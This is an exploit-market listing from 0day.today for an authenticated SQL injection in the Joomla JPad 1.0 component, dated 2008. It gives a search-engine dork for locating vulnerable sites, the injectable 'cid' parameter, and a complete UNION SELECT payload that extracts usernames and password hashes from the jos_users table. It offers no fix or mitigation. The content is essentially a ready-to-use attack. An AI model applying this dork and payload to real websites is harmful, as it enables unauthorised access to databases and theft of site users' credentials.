[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth)

Author
His0k4
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2915
Category
web applications
Date add
23-04-2008
Platform
unsorted
================================================================
Joomla Component JPad 1.0 SQL Injection Vulnerability (postauth)
================================================================



#########################################################
#							#
#     Joomla Component JPad Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Greetz : All friends & muslims HaCkeRs  :) 

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "JPad"


########################################

[*] DORK: allinurl:com_jpad

########################################

[*] P.O.C: /index.php?option=com_jpad&task=edit&Itemid=39&cid=[SQL]
[*] Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--
[*] Note : You have to register an account in the site.
########################################



#  0day.today [2024-12-23]  #